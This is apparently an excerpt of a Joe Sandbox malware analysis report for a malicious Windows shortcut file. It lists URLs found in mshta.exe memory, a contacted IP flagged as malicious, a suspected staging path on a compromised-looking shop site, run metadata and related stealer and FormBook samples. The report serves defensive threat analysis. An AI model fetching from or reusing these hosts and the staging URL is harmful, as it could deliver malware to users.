                                                                                    https://gurt.duna.ua/wp-content/themes/flatsome/assets/css/flatsome-shop.css?ver=3.17.5;mshta.exe, 00000004.00000002.3290590957.00000134703C4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.2284096124.000001347039C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.2284176018.00000134703BD000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                      		unknown
                                                                                      https://gurt.duna.ua/wp-includes/js/dist/vendor/wp-polyfill.min.js?ver=3.15.0mshta.exe, 00000004.00000003.2283680885.0000013470665000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.3289106843.0000012C6E171000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.3291335831.0000013470665000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.2148872004.0000012C6E17C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                        		unknown
                                                                                        https://gurt.duna.ua/wp-content/fonts/rubik/iJWZBXyIfDnIV5PNhY1KTN7Z-Yh-B4iFUkUzdYPFkaVNA6w.woff)mshta.exe, 00000004.00000002.3289106843.0000012C6E171000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.3290590957.00000134703C4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.2284096124.000001347039C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.3290475443.000001347033D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.2148398104.00000134703C4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.2284176018.00000134703BD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.2148872004.0000012C6E17C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.3291335831.000001347062F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.2283680885.000001347062F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                          		unknown
                                                                                          https://gurt.duna.ua/wp-content/plugins/woo-discount-rules-pro/Assets/Js/awdr_pro.js?ver=2.3.7.jsmshta.exe, 00000004.00000002.3290590957.00000134703C4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.2284096124.000001347039C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.2284176018.00000134703BD000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                            		unknown
                                                                                            https://gurt.duna.ua/wp-content/themes/flatsome/assets/css/flatsome-shop.css?ver=3.17.5#mshta.exe, 00000004.00000003.2284096124.000001347039C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.3290562334.000001347039C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.2148626688.000001347039C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                              		unknown
                                                                                              https://gurt.duna.ua/wp-content/plugins/woocommerce-products-filter/img/delete.png);background-size:mshta.exe, 00000004.00000002.3290475443.000001347033D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                		unknown
                                                                                                https://gurt.duna.ua/wp-content/themes/flatsome/assets/js/woocommerce.js?ver=1a392523165907adee6aRsmshta.exe, 00000004.00000002.3290590957.00000134703C4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.2284096124.000001347039C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.2148398104.00000134703C4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.2284176018.00000134703BD000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                  		unknown
                                                                                                  https://gurt.duna.ua/wp-content/plugins/woocommerce-products-filter/ext/smart_designer/css/tooltip.cmshta.exe, 00000004.00000003.2148398104.00000134703C4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.2284176018.00000134703BD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.2148872004.0000012C6E17C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.3291335831.000001347062F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.2283680885.000001347062F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                    		unknown
                                                                                                    https://gurt.duna.ua/wp-content/fonts/rubik/iJWZBXyIfDnI.nav-paginationmshta.exe, 00000004.00000002.3290475443.000001347033D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                      		unknown
                                                                                                      https://gurt.duna.ua/wp-content/themes/flatsome/assets/css/icons/fl-icons.svg?v=3.17.5#fl-icons)mshta.exe, 00000004.00000002.3290590957.00000134703C4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.2148626688.000001347036E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.2284096124.000001347039C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.3290475443.000001347033D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.3289106843.0000012C6E0DF000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.2284176018.00000134703BD000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                        		unknown
                                                                                                        http://crl.ver)svchost.exe, 00000007.00000002.3290543621.0000021325000000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                          		unknown
                                                                                                          https://gurt.duna.ua/wp-content/plugins/woocommerce-products-filter/ext/by_onsales/js/by_onsales.js?mshta.exe, 00000004.00000003.2283680885.0000013470665000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.3289106843.0000012C6E171000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.3291335831.0000013470665000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.2148872004.0000012C6E17C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                            		unknown
                                                                                                            https://gurt.duna.ua/wp-includes/js/dist/vendor/regenerator-runtime.min.js?ver=0.13.9mshta.exe, 00000004.00000003.2283680885.0000013470665000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.3289106843.0000012C6E171000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.3291335831.0000013470665000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.2148872004.0000012C6E17C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                              		unknown
                                                                                                              https://gurt.duna.ua/wp-content/plugins/woocommerce-products-filter/ext/by_onsales/css/by_onsales.csmshta.exe, 00000004.00000003.2283680885.000001347062F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                		unknown
                                                                                                                https://gurt.duna.ua/wp-content/uploads/xcropped-logo-d-192x192.jpg.pagespeed.ic.EwuWeIzKab.jpgmshta.exe, 00000004.00000003.2148872004.0000012C6E179000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                  		unknown
                                                                                                                  https://schema.orgmshta.exe, 00000004.00000002.3290475443.000001347033D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                  • URL Reputation: safe
                                                                                                                  		unknown
                                                                                                                  https://gurt.duna.ua/wp-content/plugins/woocommerce-products-filter/js/ion.range-slider/js/ion.rangemshta.exe, 00000004.00000003.2283680885.0000013470665000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.3289106843.0000012C6E171000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.3291335831.0000013470665000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.2148872004.0000012C6E17C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                    		unknown
                                                                                                                    https://gurt.duna.ua/cart/mshta.exe, 00000004.00000003.2283680885.000001347062F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                      		unknown
                                                                                                                      http://gmpg.org/xfn/11mshta.exe, 00000004.00000002.3290475443.000001347033D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                      • URL Reputation: safe
                                                                                                                      		unknown
                                                                                                                      https://gurt.duna.ua/wp-content/themes/flatsome/assets/css/icons/fl-icons.eot?v=3.17.5);brmshta.exe, 00000004.00000002.3290590957.00000134703C4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.2284096124.000001347039C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.2284176018.00000134703BD000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                        		unknown
                                                                                                                        https://gurt.duna.ua/wp-content/uploads/xzamovlennia-280x280.png.pagespeed.ic.nWjuhwsWVe.pngmshta.exe, 00000004.00000003.2283680885.000001347062F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                          		unknown
                                                                                                                          https://gurt.duna.ua/wp-content/uploads/xdopomoha-280x280.png.pagespeed.ic.YLuKJA07kn.pngmshta.exe, 00000004.00000003.2283680885.000001347062F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                            		unknown
                                                                                                                            https://gurt.duna.ua/wp-json/mshta.exe, 00000004.00000002.3290475443.000001347033D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                              		unknown
                                                                                                                              https://gurt.duna.ua/wp-content/plugins/woo-discount-rules-pro/Assets/Js/awdr_pro.js?ver=2.3.7C:mshta.exe, 00000004.00000002.3290475443.000001347033D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                		unknown
                                                                                                                                https://gurt.duna.ua/wp-content/themes/flatsome/assets/css/flatsome-shop.css?ver=3.17.5C:mshta.exe, 00000004.00000002.3291302874.00000134705F8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                  		unknown
                                                                                                                                  https://gurt.duna.ua/programy-nauczania/GTSvitikgasuStage5Lwmshta.exe, 00000004.00000002.3290590957.00000134703C4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.2284096124.000001347039C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.2148398104.00000134703C4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.2284176018.00000134703BD000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                    		unknown
                                                                                                                                    https://gurt.duna.ua/wp-content/themes/flatsome/assets/css/icons/fl-icons.eot?v=3.17.5mshta.exe, 00000004.00000002.3290590957.00000134703C4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.2284096124.000001347039C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.2284176018.00000134703BD000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                      		unknown
                                                                                                                                      https://gurt.duna.ua/wp-content/plugins/woocommerce-products-filter/ext/slideout/css/slideout.css?vemshta.exe, 00000004.00000003.2283680885.0000013470665000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.3291335831.0000013470665000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                        		unknown
                                                                                                                                        https://gurt.duna.ua/wp-content/plugins/woocommerce-products-filter/ext/label/js/html_types/label.jsmshta.exe, 00000004.00000003.2283680885.0000013470665000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.3289106843.0000012C6E171000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.3291335831.0000013470665000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.2148872004.0000012C6E17C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                          		unknown
                                                                                                                                          https://gurt.duna.ua/wp-content/fonts/rubik/iJWZBXyIfDnIV5PNhY1KTN7Z-Yh-B4iFWkUzdYPFkaVNA6w.woff)mshta.exe, 00000004.00000002.3289106843.0000012C6E171000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.3290590957.00000134703C4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.2284096124.000001347039C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.3290475443.000001347033D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.2148398104.00000134703C4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.2284176018.00000134703BD000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.2148872004.0000012C6E17C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.3291335831.000001347062F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.2283680885.000001347062F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                            		unknown
                                                                                                                                            https://gurt.duna.ua/programy-nauczania/GTSvitikgasuStage5Lvmshta.exe, 00000004.00000003.2148398104.00000134703C4000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                              		unknown
                                                                                                                                              https://gurt.dunmshta.exe, 00000004.00000003.2284077805.0000013470415000.00000004.00000020.00020000.00000000.sdmptrue
                                                                                                                                                		unknown
                                                                                                                                                https://gurt.duna.ua/wp-content/fonts/rubik/iJWZBXyIfDnIV5PNhY1KTN7Z-Yh-B4iFWUUzdYPFkaVNA6w.woff)mshta.exe, 00000004.00000002.3290590957.00000134703C4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.2284096124.000001347039C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.2148398104.00000134703C4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.2284176018.00000134703BD000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                  		unknown
                                                                                                                                                  https://gurt.duna.ua/wp-content/plugins/woocommerce-products-filter/ext/by_instock/css/by_instock.csmshta.exe, 00000004.00000003.2283680885.000001347062F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                    		unknown
                                                                                                                                                    https://gurt.duna.ua/wp-content/plugins/woocommerce-products-filter/css/front.css?ver=1.3.4.2yment_mshta.exe, 00000004.00000002.3290590957.00000134703C4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.2284096124.000001347039C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.2148398104.00000134703C4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.2284176018.00000134703BD000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                      		unknown
                                                                                                                                                      https://gurt.duna.ua/wp-content/themes/flatsome/assets/css/icons/fl-icons.eot#iefix?v=3.17.5)mshta.exe, 00000004.00000002.3290590957.00000134703C4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.2284096124.000001347039C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.3290475443.000001347033D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.2284176018.00000134703BD000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                        		unknown
                                                                                                                                                        https://gurt.duna.ua/wp-content/plugins/woocommerce-products-filter/js/html_types/select.js?ver=1.3.mshta.exe, 00000004.00000003.2283680885.0000013470665000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.3291335831.0000013470665000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                          		unknown
                                                                                                                                                          https://gurt.duna.ua/wp-content/plugins/woocommerce-products-filter/css/front.css?ver=1.3.4.2smshta.exe, 00000004.00000002.3290475443.0000013470330000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                            		unknown
                                                                                                                                                            https://gurt.duna.ua/programy-nauczania/GTSvitikgasuStage5...lymshta.exe, 00000004.00000003.2148398104.00000134703C4000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                              		unknown
                                                                                                                                                              https://gurt.duna.ua/wp-content/plugins/woocommerce-products-filter/js/front.js?ver=1.3.4.2mshta.exe, 00000004.00000003.2283680885.0000013470665000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.3291335831.0000013470665000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                		unknown
                                                                                                                                                                https://gurt.duna.ua/wp-content/uploads/xcropped-logo-d-32x32.jpg.pagespeed.ic.O2d9531Kcm.jpgmshta.exe, 00000004.00000002.3289106843.0000012C6E115000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.2148626688.000001347036E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.2148872004.0000012C6E179000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.3290475443.000001347033D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                  		unknown
                                                                                                                                                                  https://gurt.duna.ua/wp-content/themes/flatsome/assets/css/icons/fl-icons.eot?v=3.17.5);mshta.exe, 00000004.00000002.3290590957.00000134703C4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.2284096124.000001347039C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.3290475443.000001347033D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.2284176018.00000134703BD000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                    		unknown
                                                                                                                                                                    https://gurt.duna.ua/wp-content/plugins/woocommerce-products-filter/ext/by_text/assets/js/front.js?vmshta.exe, 00000004.00000003.2283680885.0000013470665000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.3289106843.0000012C6E171000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.3291335831.0000013470665000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.2148872004.0000012C6E17C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                      		unknown
                                                                                                                                                                      http://gmpg.org/xfn/114mshta.exe, 00000004.00000002.3290475443.000001347033D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                        		unknown
                                                                                                                                                                        https://gurt.duna.ua/wp-content/plugins/woocommerce/assets/js/frontend/woocommerce.min.js?ver=5.6.2mshta.exe, 00000004.00000003.2283680885.0000013470665000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.3291335831.0000013470665000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                          		unknown
                                                                                                                                                                          https://yoast.com/wordpress/plugins/seo/mshta.exe, 00000004.00000002.3290590957.0000013470411000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.2148398104.0000013470411000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.3290475443.000001347033D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.2284096124.0000013470411000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                          • URL Reputation: safe
                                                                                                                                                                          		unknown
                                                                                                                                                                          https://gurt.duna.ua/my-account/mshta.exe, 00000004.00000002.3291335831.000001347062F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.2283680885.000001347062F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                            		unknown
                                                                                                                                                                            https://gurt.duna.ua/wp-content/plugins/woo-discount-rules-pro/Assets/Css/awdr_style.css?ver=2.3.7jmshta.exe, 00000004.00000002.3290590957.0000013470411000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.2148398104.0000013470411000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.2284096124.0000013470411000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                              		unknown
                                                                                                                                                                              https://gurt.duna.ua/programy-nauczania/GTSvitikgasuStage5...mshta.exe, 00000004.00000002.3290590957.00000134703C4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.3289106843.0000012C6E115000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.2284096124.000001347039C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.2148398104.00000134703C4000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.2284176018.00000134703BD000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                		unknown
                                                                                                                                                                                https://www.morkva.co.ua?utm_source=client-site&utm_medium=client-footer-linkmshta.exe, 00000004.00000002.3291335831.000001347062F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.2283680885.000001347062F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                  		unknown
                                                                                                                                                                                  https://gurt.duna.ua/comments/feed/mshta.exe, 00000004.00000002.3290475443.000001347033D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                    		unknown
                                                                                                                                                                                    https://gurt.duna.ua/wp-content/plugins/woo-discount-rules/v2/Assets/Js/site_main.js?ver=2.3.8fmshta.exe, 00000004.00000003.2148398104.0000013470411000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.2284077805.0000013470415000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.3290688605.0000013470424000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                      		unknown
                                                                                                                                                                                      https://gurt.duna.ua/order-table/mshta.exe, 00000004.00000002.3291335831.000001347062F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.2283680885.000001347062F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                        		unknown
                                                                                                                                                                                        https://gurt.duna.ua/wp-content/plugins/woo-discount-rules/v2/Assets/Js/site_main.js?ver=2.3.8C:mshta.exe, 00000004.00000002.3290475443.000001347033D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                          		unknown
                                                                                                                                                                                          https://gurt.duna.ua/wp-content/plugins/woocommerce-products-filter/js/html_types/radio.js?ver=1.3.4mshta.exe, 00000004.00000003.2283680885.0000013470665000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.3291335831.0000013470665000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                            		unknown
                                                                                                                                                                                            https://gurt.duna.ua/programy-nauczania/GTSvitikgasuStage5qmshta.exe, 00000004.00000003.2284096124.000001347040D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                              		unknown
                                                                                                                                                                                              https://gurt.duna.ua/wp-includes/js/jquery/jquery.min.js?ver=3.6.1mmshta.exe, 00000004.00000002.3290475443.000001347033D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                		unknown
                                                                                                                                                                                                https://gurt.duna.ua/programy-nauczania/GTSvitikgasuStage5umshta.exe, 00000004.00000002.3289106843.0000012C6E115000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                  		unknown
                                                                                                                                                                                                  https://gurt.duna.uamshta.exe, 00000004.00000002.3290715017.0000013470449000.00000004.00000020.00020000.00000000.sdmptrue
                                                                                                                                                                                                    		unknown
                                                                                                                                                                                                    https://gurt.duna.ua/wp-content/plugins/woocommerce-products-filter/ext/by_text/mshta.exe, 00000004.00000002.3290715017.0000013470449000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                      		unknown

                                                                                                                                                                                                      World Map of Contacted IPs

                                                                                                                                                                                                      • No. of IPs < 25%
                                                                                                                                                                                                      • 25% < No. of IPs < 50%
                                                                                                                                                                                                      • 50% < No. of IPs < 75%
                                                                                                                                                                                                      • 75% < No. of IPs

                                                                                                                                                                                                      Public IPs

                                                                                                                                                                                                      IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                                                                      185.68.16.189
                                                                                                                                                                                                      		gurt.duna.uaUkraine
                                                                                                                                                                                                      		200000UKRAINE-ASUAtrue

                                                                                                                                                                                                      Private

                                                                                                                                                                                                      IP
                                                                                                                                                                                                      127.0.0.1

                                                                                                                                                                                                      General Information

                                                                                                                                                                                                      Joe Sandbox version:41.0.0 Charoite
                                                                                                                                                                                                      Analysis ID:1543063
                                                                                                                                                                                                      Start date and time:2024-10-27 07:34:09 +01:00
                                                                                                                                                                                                      Joe Sandbox product:CloudBasic
                                                                                                                                                                                                      Overall analysis duration:0h 4m 32s
                                                                                                                                                                                                      Hypervisor based Inspection enabled:false
                                                                                                                                                                                                      Report type:full
                                                                                                                                                                                                      Cookbook file name:default.jbs
                                                                                                                                                                                                      Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                                                                                                      Number of analysed new started processes analysed:9
                                                                                                                                                                                                      Number of new started drivers analysed:0
                                                                                                                                                                                                      Number of existing processes analysed:0
                                                                                                                                                                                                      Number of existing drivers analysed:0
                                                                                                                                                                                                      Number of injected processes analysed:0
                                                                                                                                                                                                      Technologies:
                                                                                                                                                                                                      • HCA enabled
                                                                                                                                                                                                      • EGA enabled
                                                                                                                                                                                                      • AMSI enabled
                                                                                                                                                                                                      Analysis Mode:default
                                                                                                                                                                                                      Analysis stop reason:Timeout
                                                                                                                                                                                                      Sample name:sbOq2d6k2t.lnk
                                                                                                                                                                                                      renamed because original name is a hash value
                                                                                                                                                                                                      Original Sample Name:806b5269e7aa9c2c82ce247b30a3e92a4f7285b21e2bcf54c8ffad86bd92ea68.lnk
                                                                                                                                                                                                      Detection:MAL
                                                                                                                                                                                                      Classification:mal68.winLNK@7/39@1/2
                                                                                                                                                                                                      EGA Information:Failed
                                                                                                                                                                                                      HCA Information:
                                                                                                                                                                                                      • Successful, ratio: 100%
                                                                                                                                                                                                      • Number of executed functions: 4
                                                                                                                                                                                                      • Number of non-executed functions: 0
                                                                                                                                                                                                      Cookbook Comments:
                                                                                                                                                                                                      • Found application associated with file extension: .lnk

                                                                                                                                                                                                      Warnings

                                                                                                                                                                                                      • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
                                                                                                                                                                                                      • Excluded IPs from analysis (whitelisted): 184.28.90.27
                                                                                                                                                                                                      • Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, e16604.g.akamaiedge.net, ctldl.windowsupdate.com, prod.fs.microsoft.com.akadns.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, fe3cr.delivery.mp.microsoft.com
                                                                                                                                                                                                      • Execution Graph export aborted for target mshta.exe, PID 6500 because it is empty
                                                                                                                                                                                                      • Not all processes where analyzed, report is missing behavior information
                                                                                                                                                                                                      • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                                                                                      • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                                                                                                      • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                                                                                                      • VT rate limit hit for: sbOq2d6k2t.lnk

                                                                                                                                                                                                      Simulations

                                                                                                                                                                                                      Behavior and APIs

                                                                                                                                                                                                      TimeTypeDescription
                                                                                                                                                                                                      02:35:22API Interceptor2x Sleep call for process: svchost.exe modified
                                                                                                                                                                                                      02:35:22API Interceptor1x Sleep call for process: mshta.exe modified

                                                                                                                                                                                                      Joe Sandbox View / Context

                                                                                                                                                                                                      IPs

                                                                                                                                                                                                      No context

                                                                                                                                                                                                      Domains

                                                                                                                                                                                                      No context

                                                                                                                                                                                                      ASNs

                                                                                                                                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                      UKRAINE-ASUAMglAEOjknh.elfGet hashmaliciousOkiruBrowse
                                                                                                                                                                                                      • 185.233.45.122
                                                                                                                                                                                                      request-BPp -RFQ 0975432.exeGet hashmaliciousPureLog StealerBrowse
                                                                                                                                                                                                      • 185.68.16.94
                                                                                                                                                                                                      NOXGUARD AUS 40 UREA__912001_NOR_EN - MSDS.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                      • 185.68.16.94
                                                                                                                                                                                                      custom_clearance_notification_20240918.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                                                      • 91.222.136.87
                                                                                                                                                                                                      PURCHASE ORDER-6350.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                                                      • 185.68.16.133
                                                                                                                                                                                                      NEW ORDERS scan_29012019.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                                                      • 185.68.16.133
                                                                                                                                                                                                      New Purchase Order.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                                                      • 185.68.16.133
                                                                                                                                                                                                      myfile.exeGet hashmaliciousSodinokibi, Chaos, Netwalker, Revil, TrojanRansomBrowse
                                                                                                                                                                                                      • 185.68.16.21
                                                                                                                                                                                                      z1DOCUMENTINV.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                                                      • 91.222.136.87
                                                                                                                                                                                                      http://e1.eslenglish-hk.com/Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                      • 185.104.45.106

                                                                                                                                                                                                      JA3 Fingerprints

                                                                                                                                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                      37f463bf4616ecd445d4a1937da06e19t4GNf3V8mp.exeGet hashmaliciousStealc, VidarBrowse
                                                                                                                                                                                                      • 185.68.16.189
                                                                                                                                                                                                      JOSXXL1.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                                                                                                      • 185.68.16.189
                                                                                                                                                                                                      GK059kPZ5B.exeGet hashmaliciousStealcBrowse
                                                                                                                                                                                                      • 185.68.16.189
